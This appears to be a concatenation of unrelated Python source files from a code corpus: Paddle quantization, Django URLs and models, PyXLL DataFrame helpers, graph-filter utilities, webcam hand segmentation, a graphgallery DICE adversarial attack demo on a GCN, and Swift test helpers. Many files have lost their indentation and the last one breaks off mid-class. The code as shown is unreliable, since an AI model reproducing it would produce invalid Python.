var_tensor = var_tensor.ravel()
save_path = os.path.join(self._cache_dir,
var_name + "_" + str(iter) + ".npy")
save_dir, file_name = os.path.split(save_path)
if not os.path.exists(save_dir):
                    os.makedirs(save_dir)
np.save(save_path, var_tensor)
else:
for var_name in self._quantized_act_var_name:
if var_name not in self._sampling_data:
self._sampling_data[var_name] = []
var_tensor = _load_variable_data(self._scope, var_name)
var_tensor = var_tensor.ravel()
self._sampling_data[var_name].append(var_tensor)
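# Illustrative sketch (assumes an executor, a loaded inference program and a
# paddlex dataset already exist; every name below is hypothetical):
#
#   ptq = PaddleXPostTrainingQuantization(
#       executor=exe, dataset=eval_dataset, program=test_prog,
#       inputs=test_inputs, outputs=test_outputs,
#       batch_size=10, batch_nums=10, algo='KL')
#   quant_program = ptq.quantize()
#   ptq.save_quantized_model('./quant_model')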
|
py | b4000e1743e9364125171eb796571a8e8305e514 | from django.conf import settings
from django.urls import include, path
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/",
TemplateView.as_view(template_name="pages/about.html"),
name="about",
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
path(
"sounds/",
include("sonolib.sounds.urls", namespace="sounds"),
),
# User management
path(
"users/",
include("sonolib.users.urls", namespace="users"),
),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(
settings.MEDIA_URL, document_root=settings.MEDIA_ROOT
)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
|
py | b4000e81964ef6a9c5dc1fa8239426cb2996598b | import juno
class Config:
def __init__(self):
juno.init(
client_id="my client_id",
client_secret="my client_secret",
resource_token="my resource_token",
idempotency_key="my idempotency_key",
sandbox=True,
)
|
py | b4000f1d6022736b54191bbef5e260cb4806ce6a | """Regression Model"""
__docformat__ = "numpy"
from typing import Tuple, List, Any, Union
import pandas as pd
from tsxv import splitTrain
from sklearn import linear_model
from sklearn import pipeline
from sklearn import preprocessing
def get_regression_model(
values: Union[pd.Series, pd.DataFrame],
poly_order: int,
n_input: int,
n_predict: int,
n_jumps: int,
) -> Tuple[List[float], Any]:
"""Fit regression model of variable order
Parameters
----------
values : Union[pd.Series, pd.DataFrame]
Data to fit
poly_order : int
Order of polynomial
n_input : int
Length of input sequence
n_predict : int
Length of prediction sequence
n_jumps : int
Number of jumps in data preparation
Returns
-------
List[float]
List of predicted values
Any
Linear model fit to data
"""
# Split training data
stock_x, stock_y = splitTrain.split_train(
values.values,
n_input,
n_predict,
n_jumps,
)
if not stock_x:
print("Given the model parameters more training data is needed.\n")
return [], None
# Machine Learning model
if poly_order == 1:
model = linear_model.LinearRegression(n_jobs=-1)
else:
model = pipeline.make_pipeline(
preprocessing.PolynomialFeatures(poly_order), linear_model.Ridge()
)
model.fit(stock_x, stock_y)
l_predictions = [
i if i > 0 else 0
for i in model.predict(values.values[-n_input:].reshape(1, -1))[0]
]
return l_predictions, model
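if __name__ == "__main__":
    # Minimal smoke test (illustrative only, not part of the library): fit a
    # degree-2 model on a synthetic series and print the next 5 predictions.
    toy_series = pd.Series([float(i) ** 1.5 for i in range(60)])
    predictions, fitted_model = get_regression_model(
        toy_series, poly_order=2, n_input=20, n_predict=5, n_jumps=1
    )
    print(predictions)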
|
py | b4000fb96b6e292ef9b330c73b186af27e97a7ec | import os.path as osp
import shutil
import time
from click.testing import CliRunner
from mim.commands.install import cli as install
from mim.commands.train import cli as train
from mim.utils import download_from_file, extract_tar, is_installed
dataset_url = 'https://download.openmmlab.com/mim/dataset.tar'
cfg_url = 'https://download.openmmlab.com/mim/resnet18_b16x8_custom.py'
def setup_module():
runner = CliRunner()
if not is_installed('mmcls'):
result = runner.invoke(install, ['mmcls', '--yes'])
assert result.exit_code == 0
def test_train():
runner = CliRunner()
if not osp.exists('/tmp/dataset'):
download_from_file(dataset_url, '/tmp/dataset.tar')
extract_tar('/tmp/dataset.tar', '/tmp/')
if not osp.exists('/tmp/config.py'):
download_from_file(cfg_url, '/tmp/config.py')
# wait for the download task to complete
time.sleep(5)
result = runner.invoke(
train, ['mmcls', '/tmp/config.py', '--gpus=0', '--work-dir=tmp'])
assert result.exit_code == 0
result = runner.invoke(
train, ['mmcls', '/tmp/xxx.py', '--gpus=0', '--work-dir=tmp'])
assert result.exit_code != 0
shutil.rmtree('tmp')
|
py | b400102d1cc66b97e15b6831315a630b9a27b405 | import os
import ctypes
from bazel_tools.tools.python.runfiles import runfiles
import subprocess
r = runfiles.Create()
path = r.Rlocation('io_tweag_rules_haskell/tests/cc_haskell_import/hs-lib-b-wrapped.so')
foreignlib = ctypes.cdll.LoadLibrary(path)
# ATTN: If you remove this print *statement* hs_init will segfault!
# If you use the python3 print *function*, it will segfault as well!
# TODO: wtf?
print foreignlib
foreignlib.hs_init()
assert(str(foreignlib.add_one_hs(1)) == "2")
|
py | b40012eaf3ad2997ff2332fa3b97a51311554807 | """Utility net operations."""
import os
import numpy as np
import tensorflow as tf
def compute_network_density(graph, collection_name):
"""Compute the Density of a TensorFlow Neural Network."""
graph = tf.get_default_graph()
graph_def = graph.as_graph_def()
nodes_counter = 0
edges_counter = 0
for node in graph_def.node:
if node.name.startswith("{pre}/".format(pre=collection_name)):
nodes_counter += 1
edges_counter += len(node.input)
    # Guard against an empty collection: report zero density instead of failing.
try:
res = edges_counter/nodes_counter
except ZeroDivisionError:
res = 0
return res
def compute_network_flops(graph, collection_name, logdir="workspace"):
"""Compute the Density of a TensorFlow Neural Network."""
# Prepare the logdir
if not os.path.isdir(logdir):
os.makedirs(logdir)
# Build the options
opts = tf.profiler.ProfileOptionBuilder(
tf.profiler.ProfileOptionBuilder.float_operation()
).with_node_names(
start_name_regexes=["{name}.*".format(name=collection_name)]
).with_file_output(
outfile="{dir}/flops.log".format(dir=logdir)
).build()
# Get the flops object
flops = tf.profiler.profile(
graph,
options=opts
)
# pylint: disable=no-member
return flops.total_float_ops
def sort_sequence(sequence, as_list=True):
"""Sort the elements in the sequence, by layer_index."""
if isinstance(sequence, np.ndarray):
narray = sequence
else:
narray = np.array(sequence)
res = narray[narray[:, 0].argsort(kind='mergesort')]
if as_list:
return res.tolist()
else:
return res
|
py | b40013eee4d608dcc88167ae336a85ba08ad9f32 | # -*- coding: utf-8 -*-
"""
Content ui specs
=================
"""
import os
from docutils.parsers.rst import Directive, directives
from docutils import nodes
from docutils.statemachine import StringList
from sphinx.util.osutil import copyfile
from sphinx.util import logging
CSS_FILE = 'contentui.css'
JS_FILE = 'contentui.js'
class ContentTabsDirective(Directive):
"""
It's container directive with content-tabs class
"""
has_content = True
optional_arguments = 1
def run(self):
self.assert_has_content()
text = '\n'.join(self.content)
node = nodes.container(text)
node['classes'].append('content-tabs')
if self.arguments and self.arguments[0]:
node['classes'].append(self.arguments[0])
self.add_name(node)
self.state.nested_parse(self.content, self.content_offset, node)
return [node]
class ContentTabsContainerDirective(Directive):
has_content = True
option_spec = {'title': directives.unchanged}
required_arguments = 1
def run(self):
self.assert_has_content()
text = '\n'.join(self.content)
node = nodes.container(text)
node['ids'].append('tab-%s' % self.arguments[0])
node['classes'].append('tab-content')
par = nodes.paragraph(text=self.options["title"])
par['classes'].append('tab-title')
node += par
self.add_name(node)
self.state.nested_parse(self.content, self.content_offset, node)
return [node]
class ToggleDirective(Directive):
has_content = True
option_spec = {'header': directives.unchanged}
optional_arguments = 1
def run(self):
node = nodes.container()
node['classes'].append('toggle-content')
par = nodes.container()
par['classes'].append('toggle-header')
if self.arguments and self.arguments[0]:
par['classes'].append(self.arguments[0])
self.state.nested_parse(StringList([self.options["header"]]), self.content_offset, par)
self.state.nested_parse(self.content, self.content_offset, node)
return [par, node]
def add_assets(app):
app.add_css_file(CSS_FILE)
app.add_js_file(JS_FILE)
def copy_assets(app, exception):
if app.builder.name not in ['html', 'readthedocs'] or exception:
return
logger = logging.getLogger(__name__)
logger.info('Copying contentui stylesheet/javascript... ', nonl=True)
dest = os.path.join(app.builder.outdir, '_static', CSS_FILE)
source = os.path.join(os.path.abspath(os.path.dirname(__file__)), CSS_FILE)
copyfile(source, dest)
dest = os.path.join(app.builder.outdir, '_static', JS_FILE)
source = os.path.join(os.path.abspath(os.path.dirname(__file__)), JS_FILE)
copyfile(source, dest)
logger.info('done')
def setup(app):
app.add_directive('content-tabs', ContentTabsDirective)
app.add_directive('tab-container', ContentTabsContainerDirective)
app.add_directive('toggle-header', ToggleDirective)
app.connect('builder-inited', add_assets)
app.connect('build-finished', copy_assets)
|
py | b400142813f80b7bcdf12a6375e0f97e8d4abb69 | #!/usr/bin/python3
"""
Linked list test file
Pythonic implementation of Linked list
"""
__author__ = "Sunil"
__email__ = "[email protected]"
from SinglyLinkedList import SinglyLinkedList
def main():
linkedlist = SinglyLinkedList()
linkedlist.insertNodeAtHead(5)
linkedlist.insertNodeAtHead(15)
linkedlist.insertNodeAtHead(115)
linkedlist.insertNodeAtHead(1115)
print("count = ", linkedlist.Count)
node = linkedlist.Head
while(node):
print(node.Value)
node = node.Next
if __name__ == '__main__':
main() |
py | b40015578312f7a3fdc083e0c02c292f1c468f28 | import logging
from app.slack.slack_client import SlackClient
logger = logging.getLogger('default')
help_message = """```
The bot will respond with ping.
Usage:
> .pong
```"""
class PongCommand:
@staticmethod
async def handle_discord(message):
logger.info("")
await message.channel.send('ping')
@staticmethod
def handle_slack(client: SlackClient, event: dict):
logger.info("")
client.post_message(event, 'ping')
|
py | b40016b3b5045b150339b023fe1a2dc2af74ed33 | # -*- coding: utf-8 -*-
"""
utils.config
~~~~~~~~~~~~
Implements config
:author: Feei <wufeifei#wufeifei.com>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2016 Feei. All rights reserved
"""
import os
import ConfigParser
class Config:
def __init__(self, level1=None, level2=None):
self.project_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
if level1 is None and level2 is None:
return
config = ConfigParser.ConfigParser()
config_file = os.path.join(self.project_directory, 'config')
config.read(config_file)
try:
value = config.get(level1, level2)
except Exception as e:
print("./config file configure failed.\nError: {0}\nSee Help: https://github.com/wufeifei/cobra/wiki/Config".format(e.message))
exit()
self.value = value
|
py | b400174f056a778ba03e3f66fae7ea2c078d45a6 | # -*- coding: utf-8 -*-
import os
import Image
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.conf import settings
from django.contrib.auth.models import User
from filebrowser.fields import FileBrowseField
from filebrowser.base import FileObject
from uuslug import uuslug as slugify
from sorl.thumbnail import ImageField
class Gallery(models.Model):
title = models.CharField("Имя", max_length=255)
visits_num = models.PositiveIntegerField("Кол. посещений", default=0, editable=False)
def __unicode__(self):
return self.title
def inc_visits(self):
self.visits_num += 1
self.save()
class Meta:
verbose_name = "Галерея изображений к рецептам"
verbose_name_plural = "Галереии изображений к рецептам"
def get_upload_path(instance, filename):
from utils import timestampbased_filename
gallery_slug = slugify(instance.gallery.title)
user_slug = slugify(instance.author.username) if instance.author else "anonymous"
path = os.path.join(
'gallery',
gallery_slug,
user_slug,
timestampbased_filename(filename))
return path
class GalleryImage(models.Model):
image = ImageField("Изображение", upload_to=get_upload_path, max_length=255)
title = models.CharField("Подпись", max_length=255, blank=True, null=True)
author = models.ForeignKey(User, verbose_name="Автор", blank=True, null=True)
gallery = models.ForeignKey(Gallery, verbose_name="Галерея изображений", related_name="images")
visits_num = models.PositiveIntegerField("Кол. посещений", default=0, editable=False)
def __unicode__(self):
return self.title if self.title else self.image.name
def inc_visits(self):
self.visits_num += 1
self.save()
class Meta:
verbose_name = "Изображение"
verbose_name_plural = "Изображения"
@receiver(post_save, sender=GalleryImage)
def watermark(sender, instance, created, **kwargs):
from utils import add_watermark
marked_img = add_watermark(instance.image)
if not marked_img:
return
instance.image = marked_img
instance.save()
|
py | b400184760815ea19c86646cd4533a92c8e6ae08 | # Copyright 2010 by Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles requests from a UI hook to get users started with email update."""
__author__ = '[email protected]'
import re
import cache
import mail_editor
import utils
from feedlib.errors import ErrorMessage
from feedlib.struct import Struct
EMAIL_PATTERN = re.compile(
r'(?:^|\s)[-a-z0-9_.%+]+@(?:[-a-z0-9]+\.)+[a-z]{2,6}(?:\s|$)',re.IGNORECASE)
def is_valid_email(email):
"""Basic validation for an email address,
returns True if valid, False if invalid, None if empty string."""
if not email:
return None
    if EMAIL_PATTERN.match(email):
        return True
    return False
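# Minimal sketch (editor addition): quick self-check of the validator above.
# The address used here is a made-up example.
def _example_is_valid_email():
    assert is_valid_email('user@example.com')
    assert not is_valid_email('not-an-email')
    assert is_valid_email('') is None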
class MailEditorStart(utils.Handler):
"""Handler for /mail_editor_start, which is a UI hook to get
users started with RF's email update feature. The handler
sends a template email for updating the provided facility
to the provided address.
Attributes:
email: the email address to mail
Methods:
init(): handles initialization tasks for the class
post(): responds to HTTP POST requests
"""
def init(self):
"""Handles any initialization tasks for the class."""
self.email = self.request.get('email')
def post(self):
"""Responds to HTTP POST requests."""
self.init()
if not is_valid_email(self.email):
#i18n: Error message for invalid email address
self.write(_('Email address is invalid.'))
return
self.minimal_subject = cache.MINIMAL_SUBJECTS[
self.subdomain].get(self.params.subject_name)
if not self.minimal_subject:
#i18n: Error message for invalid subject
raise ErrorMessage(400, _('Invalid subject'))
title = self.minimal_subject.get_value('title', '')
min_subjects = mail_editor.get_min_subjects_by_lowercase_title(
self.subdomain, title)
if len(min_subjects) > 1:
title = '%s (%s)' % (title, self.params.subject_name)
to = '%s-updates@%s' % (self.subdomain, self.get_parent_domain()
.replace('appspot.com', 'appspotmail.com'))
message = Struct()
message.sender = self.email
message.to = to
message.subject = ('Resource Finder: Email update instructions for %s'
% title)
editor = mail_editor.MailEditor()
editor.request = self.request
editor.init(message)
editor.send_template_email(message, self.minimal_subject, title)
self.write('OK')
if __name__ == '__main__':
utils.run([('/mail_editor_start', MailEditorStart)], debug=True)
|
py | b40019656464f94d0a39c8daae144207dc1f8ef2 | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
setup_args = generate_distutils_setup(
packages=['sm_classes'],
package_dir={'': 'src'}
)
setup(**setup_args) |
py | b400198066e2a01a6639495c1c0ffca61ac5093a | #-------------------------------------------
# SEGMENT HAND REGION FROM A VIDEO SEQUENCE
#-------------------------------------------
# organize imports
import cv2
import imutils
import numpy as np
from PIL import Image as im
import time
from modelPredict import *
from interfaceModule import *
from configuration import *
# global variables
bg = None
bgfg = 0
#--------------------------------------------------
# To find the running average over the background
#--------------------------------------------------
def run_avg(image, aWeight):
global bg
# initialize the background
if bg is None:
bg = image.copy().astype("float")
return
# compute weighted average, accumulate it and update the background
cv2.accumulateWeighted(image, bg, aWeight)
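# Note (editor addition): cv2.accumulateWeighted updates the running background as
#   bg = (1 - aWeight) * bg + aWeight * image
# so a larger aWeight makes the background model adapt faster to scene changes.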
#---------------------------------------------
# To segment the region of hand in the image
#---------------------------------------------
def segment(image, threshold = 50):
global bg
thresholded = None
# find the absolute difference between background and current frame
diff = cv2.absdiff(bg.astype("uint8"), image)
mytime = time.localtime()
if mytime.tm_hour < 6 or mytime.tm_hour > 18:
# print ('It is night-time')
threshold = 50
thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY )[1]
else:
# print ('It is day-time')
threshold = 127
thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
# threshold the diff image so that we get the foreground
# thresholded = cv2.threshold(diff, threshold, 255, cv2.THRESH_BINARY )[1]
# get the contours in the thresholded image
(cnts, _) = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# return None, if no contours detected
if len(cnts) == 0:
return
else:
# based on contour area, get the maximum contour which is the hand
segmented = max(cnts, key=cv2.contourArea)
return (thresholded, segmented)
#-----------------
# MAIN FUNCTION
#-----------------
if __name__ == "__main__":
# initialize weight for running average
aWeight = 0.5
# get the reference to the webcam
camera = cv2.VideoCapture(0)
# region of interest (ROI) coordinates
top, right, bottom, left = 1, 400, 350, 800
# initialize num of frames
num_frames = 0
lasttime = int(time.time())
# keep looping, until interrupted
while(True):
# get the current frame
(grabbed, frame) = camera.read()
# resize the frame
frame = imutils.resize(frame, width=800)
# flip the frame so that it is not the mirror view
frame = cv2.flip(frame, 1)
# clone the frame
clone = frame.copy()
# get the height and width of the frame
(height, width) = frame.shape[:2]
# get the ROI
roi = frame[top:bottom, right:left]
# convert the roi to grayscale and blur it
gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7),0)
# to get the background, keep looking till a threshold is reached
# so that our running average model gets calibrated
if num_frames < 25:
run_avg(gray, aWeight)
else:
# segment the hand region
hand = segment(gray)
# check whether hand region is segmented
if hand is not None:
# if yes, unpack the thresholded image and
# segmented region
(thresholded, segmented) = hand
# draw the segmented region and display the frame
cv2.drawContours(clone, [segmented + (right, top)], -1, (0, 0, 255))
dataImage = im.fromarray(thresholded)
cur = int(time.time())
if cur >= (lasttime + 5):
lasttime = cur
print('Welcome')
strval = classifier(dataImage)
# print(cnfg(strval))
interfacer(strval, cnfg(strval))
print('Hello ---> '+strval)
cv2.imshow("Threshloded value", thresholded)
# cv2.imwrite(str(int(time.time()))+'.jpg', thresholded)
# draw the segmented hand
cv2.rectangle(clone, (left, top), (right, bottom), (0,255,0), 2)
# increment the number of frames
num_frames += 1
# display the frame with segmented hand
cv2.imshow("Video Feed", clone)
# observe the keypress by the user
keypress = cv2.waitKey(1) & 0xFF
# if the user pressed "q", then stop looping
if keypress == ord("q"):
resetVal()
break
# free up memory
camera.release()
cv2.destroyAllWindows() |
py | b40019cb00780c59dcf9d7c4987ff3fc61aa7ed0 | from __future__ import absolute_import
import numpy as np
from scipy import sparse as sp
from scipy.sparse.linalg import ArpackNoConvergence
def degree(adj):
"""
Computes the degree matrix of the given adjacency matrix.
:param adj: rank 2 array or sparse matrix
:return: the degree matrix in sparse DIA format
"""
degrees = np.array(adj.sum(1)).flatten()
return sp.diags(degrees)
def degree_power(adj, pow):
"""
Computes \(D^{p}\) from the given adjacency matrix. Useful for computing
normalised Laplacians.
:param adj: rank 2 array or sparse matrix
:param pow: exponent to which elevate the degree matrix
:return: the exponentiated degree matrix in sparse DIA format
"""
degrees = np.power(np.array(adj.sum(1)), pow).flatten()
degrees[np.isinf(degrees)] = 0.
return sp.diags(degrees, 0)
def normalized_adjacency(adj, symmetric=True):
"""
Normalizes the given adjacency matrix using the degree matrix as either
\(D^{-1}A\) or \(D^{-1/2}AD^{-1/2}\) (symmetric normalization).
:param adj: rank 2 array or sparse matrix;
:param symmetric: boolean, compute symmetric normalization;
:return: the normalized adjacency matrix.
"""
if symmetric:
normalized_D = degree_power(adj, -0.5)
if sp.issparse(adj):
output = normalized_D.dot(adj).dot(normalized_D)
else:
normalized_D = normalized_D.toarray()
output = normalized_D.dot(adj).dot(normalized_D)
else:
normalized_D = degree_power(adj, -1.)
output = normalized_D.dot(adj)
return output
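# Minimal sketch (editor addition): symmetric normalization of a 2-node graph.
# With A = [[0, 1], [1, 0]] both degrees are 1, so D^(-1/2) A D^(-1/2) equals A.
def _example_normalized_adjacency():
    A = sp.csr_matrix(np.array([[0., 1.], [1., 0.]]))
    return normalized_adjacency(A, symmetric=True).toarray()  # [[0., 1.], [1., 0.]]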
def laplacian(adj):
"""
Computes the Laplacian of the given adjacency matrix as \(D - A\).
:param adj: rank 2 array or sparse matrix;
:return: the Laplacian.
"""
return degree(adj) - adj
def normalized_laplacian(adj, symmetric=True):
"""
Computes a normalized Laplacian of the given adjacency matrix as
\(I - D^{-1}A\) or \(I - D^{-1/2}AD^{-1/2}\) (symmetric normalization).
:param adj: rank 2 array or sparse matrix;
:param symmetric: boolean, compute symmetric normalization;
:return: the normalized Laplacian.
"""
I = sp.eye(adj.shape[-1], dtype=adj.dtype)
normalized_adj = normalized_adjacency(adj, symmetric=symmetric)
return I - normalized_adj
def rescale_laplacian(L, lmax=2):
"""
Rescales the Laplacian eigenvalues in [-1,1], using lmax as largest eigenvalue.
"""
if lmax is None:
try:
lmax = sp.linalg.eigsh(L, 1, which='LM', return_eigenvectors=False)[0]
except ArpackNoConvergence:
lmax = 2
L_scaled = (2. / lmax) * L - sp.eye(L.shape[0], dtype=L.dtype)
return L_scaled
def localpooling_filter(adj, symmetric=True):
"""
Computes the local pooling filter from the given adjacency matrix, as
described by Kipf & Welling (2017).
:param adj: a np.array or scipy.sparse matrix of rank 2 or 3;
:param symmetric: boolean, whether to normalize the matrix as
\(D^{-\\frac{1}{2}}AD^{-\\frac{1}{2}}\) or as \(D^{-1}A\);
:return: the filter matrix, as dense np.array.
"""
fltr = adj.copy()
I = sp.eye(adj.shape[-1], dtype=adj.dtype)
if adj.ndim == 3:
for i in range(adj.shape[0]):
A_tilde = adj[i] + I
fltr[i] = normalized_adjacency(A_tilde, symmetric=symmetric)
else:
A_tilde = adj + I
fltr = normalized_adjacency(A_tilde, symmetric=symmetric)
return fltr
def chebyshev_polynomial(X, k):
"""
Calculates Chebyshev polynomials up to order k.
:param X: a np.array or scipy.sparse matrix;
:param k: the order up to which compute the polynomials,
:return: a list of k + 1 sparse matrices with one element for each degree of
the approximation.
"""
T_k = list()
T_k.append(sp.eye(X.shape[0], dtype=X.dtype).tocsr())
T_k.append(X)
def chebyshev_recurrence(T_k_minus_one, T_k_minus_two, X):
X_ = sp.csr_matrix(X, copy=True)
return 2 * X_.dot(T_k_minus_one) - T_k_minus_two
for i in range(2, k + 1):
T_k.append(chebyshev_recurrence(T_k[-1], T_k[-2], X))
return T_k
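# Minimal sketch (editor addition): for k = 2 the returned list holds
# T_0 = I, T_1 = X and T_2 = 2*X*X - I, i.e. k + 1 matrices in total.
def _example_chebyshev_polynomial():
    X = sp.eye(3, format='csr')
    return len(chebyshev_polynomial(X, 2))  # 3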
def chebyshev_filter(adj, k, symmetric=True):
"""
Computes the Chebyshev filter from the given adjacency matrix, as described
in Defferrard et at. (2016).
:param adj: a np.array or scipy.sparse matrix;
:param k: integer, the order up to which to compute the Chebyshev polynomials;
:param symmetric: boolean, whether to normalize the matrix as
\(D^{-\\frac{1}{2}}AD^{-\\frac{1}{2}}\) or as \(D^{-1}A\);
:return: a list of k+1 filter matrices, as np.arrays.
"""
normalized_adj = normalized_adjacency(adj, symmetric)
L = sp.eye(adj.shape[0], dtype=adj.dtype) - normalized_adj # Compute Laplacian
# Rescale Laplacian
L_scaled = rescale_laplacian(L)
# Compute Chebyshev polynomial approximation
T_k = chebyshev_polynomial(L_scaled, k)
return T_k
|
py | b4001a2e827b544e40fc6202ef6f3e0131d273b0 | """
Collection of functions for manipulating DataFrames in Excel.
"""
from pyxll import xl_func, get_type_converter
import pandas as pd
import numpy as np
@xl_func("dataframe, int, str[], int: dataframe", auto_resize=True)
def df_head(df, n, columns=[], offset=0):
"""Return the first n rows of a DataFrame."""
columns = [c for c in columns if c]
if columns:
df = df[columns]
if offset:
df = df.iloc[offset:]
return df.head(n)
@xl_func("dataframe, int, str[], int: dataframe", auto_resize=True)
def df_tail(df, n, columns=[], offset=0):
"""Return the last n rows of a DataFrame."""
columns = [c for c in columns if c]
if columns:
df = df[columns]
if offset:
df = df.iloc[offset:]
return df.tail(n)
@xl_func("dataframe, str[], int: object")
def df_drop(df, columns, axis=1):
"""Drop columns from a dataframe"""
columns = [c for c in columns if c is not None]
return df.drop(columns, axis=axis)
@xl_func("dataframe df, float[] percentiles, string[] include, string[] exclude: dataframe<index=True>",
auto_resize=True)
def df_describe(df, percentiles=None, include=None, exclude=None):
"""Describe a pandas DataFrame"""
return df.describe(percentiles=percentiles,
include=include,
exclude=exclude)
@xl_func("dataframe, dict: object")
def df_eval(df, exprs):
"""Evaluate a string describing operations on DataFrame columns."""
new_columns = {}
for key, expr in exprs.items():
new_columns[key] = df.eval(expr)
new_df = pd.DataFrame(new_columns)
return df.join(new_df)
@xl_func("dataframe, str, int: object")
def df_apply(df, func, axis=0):
return df.apply(func, axis=axis)
@xl_func("dataframe, var, var: object")
def df_divide(df, x, axis=0):
return df.divide(x, axis=axis)
@xl_func("dataframe, var: object")
def df_multiply(df, x, axis=0):
return df.multiply(x, axis=axis)
@xl_func("dataframe, var, var: object")
def df_add(df, x, axis=0):
    return df.add(x, axis=axis)
@xl_func("dataframe, var, var: object")
def df_subtract(df, x, axis=0):
    return df.subtract(x, axis=axis)
@xl_func("dataframe, str[], str[], str[], var: object")
def df_pivot_table(df, index, columns=None, values=None, aggfunc="mean"):
"""Return reshaped DataFrame organized by given index / column values."""
if isinstance(aggfunc, list):
to_dict = get_type_converter("var", "dict")
aggfunc = to_dict(aggfunc)
df = df.reset_index()
return df.pivot_table(index=index,
columns=columns,
values=values,
aggfunc=aggfunc)
@xl_func("dataframe: object")
def df_stack(df):
return df.stack()
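# Minimal sketch (editor addition): the wrapped functions are plain Python and can
# also be exercised outside Excel, assuming the pyxll module is importable there;
# PyXLL itself only handles the Excel type mapping.
def _example_df_head():
    df = pd.DataFrame({"a": range(10), "b": range(10)})
    return df_head(df, 3, columns=["a"], offset=2)  # rows 2-4 of column "a"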
|
py | b4001a3ccc5d06fe5f473bf28f9a4684beae0555 | import graphgallery as gg
from graphgallery import functional as gf
from graphgallery.datasets import NPZDataset
data = NPZDataset('cora',
root="~/GraphData/datasets/",
verbose=False,
transform="standardize")
graph = data.graph
splits = data.split_nodes(random_state=15)
################### Attacker model ############################
target = 1
attacker = gg.attack.targeted.DICE(graph, seed=123).process()
attacker.attack(target)
################### Victim model ############################
# Before attack
trainer = gg.gallery.nodeclas.GCN(seed=123).make_data(graph).build()
his = trainer.fit(splits.train_nodes,
splits.val_nodes,
verbose=1,
epochs=100)
original_predict = trainer.predict(target, transform="softmax")
# After attack
trainer = gg.gallery.nodeclas.GCN(seed=123).make_data(attacker.g).build()
his = trainer.fit(splits.train_nodes,
splits.val_nodes,
verbose=1,
epochs=100)
perturbed_predict = trainer.predict(target, transform="softmax")
################### Results ############################
print("original prediction", original_predict)
print("perturbed prediction", perturbed_predict)
target_label = graph.node_label[target]
print(f"The True label of node {target} is {target_label}.")
print(
f"The probability of prediction has gone down {original_predict[target_label]-perturbed_predict[target_label]}"
)
"""original prediction [0.00212943 0.0030072 0.90525377 0.03167017 0.01139321 0.00445553
0.04209068]
perturbed prediction [0.02642256 0.02367809 0.5953164 0.10504714 0.06514036 0.03142949
0.15296602]
The True label of node 1 is 2.
The probability of prediction has gone down 0.30993735790252686"""
|
py | b4001ad728662cacc98aa8436b91addb98025ad2 | # This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2020 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
from __future__ import absolute_import, unicode_literals
import functools
import os
import platform
import sys
import unittest
from io import StringIO
from build_swift import cache_utils
from build_swift.versions import Version
__all__ = [
'quiet_output',
'redirect_stderr',
'redirect_stdout',
'requires_attr',
'requires_module',
'requires_platform',
'requires_python',
]
# -----------------------------------------------------------------------------
# Constants
_PYTHON_VERSION = Version(platform.python_version())
# -----------------------------------------------------------------------------
# Helpers
def _can_import(fullname):
try:
__import__(fullname)
return True
except ImportError:
return False
# -----------------------------------------------------------------------------
class quiet_output(object):
"""Context manager and decorator used to quiet both sys.stderr and
sys.stdout by redirecting them to os.devnull.
"""
__slots__ = ('_devnull', '_old_stderr', '_old_stdout')
def __enter__(self):
self._devnull = open(os.devnull, 'w')
self._old_stderr = sys.stderr
self._old_stdout = sys.stdout
sys.stderr = self._devnull
sys.stdout = self._devnull
def __exit__(self, exc_type, exc_value, traceback):
sys.stderr = self._old_stderr
sys.stdout = self._old_stdout
self._devnull.close()
def __call__(self, func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
with self:
return func(*args, **kwargs)
return wrapper
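# Minimal sketch (editor addition): quiet_output can wrap a noisy helper either as
# a decorator (shown here) or as a context manager.
@quiet_output()
def _example_noisy_helper():
    print('this output is swallowed by os.devnull')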
class redirect_stderr(object):
"""Context manager used to substitute sys.stderr with a different file-like
object.
"""
__slots__ = ('_stream', '_old_stderr')
def __init__(self, stream=None):
self._stream = stream or StringIO()
def __enter__(self):
self._old_stderr, sys.stderr = sys.stderr, self._stream
return self._stream
def __exit__(self, exc_type, exc_value, traceback):
sys.stderr = self._old_stderr
class redirect_stdout():
"""Context manager used to substitute sys.stdout with a different file-like
object.
"""
__slots__ = ('_stream', '_old_stdout')
def __init__(self, stream=None):
self._stream = stream or StringIO()
def __enter__(self):
        self._old_stdout, sys.stdout = sys.stdout, self._stream
        return self._stream
    def __exit__(self, exc_type, exc_value, traceback):
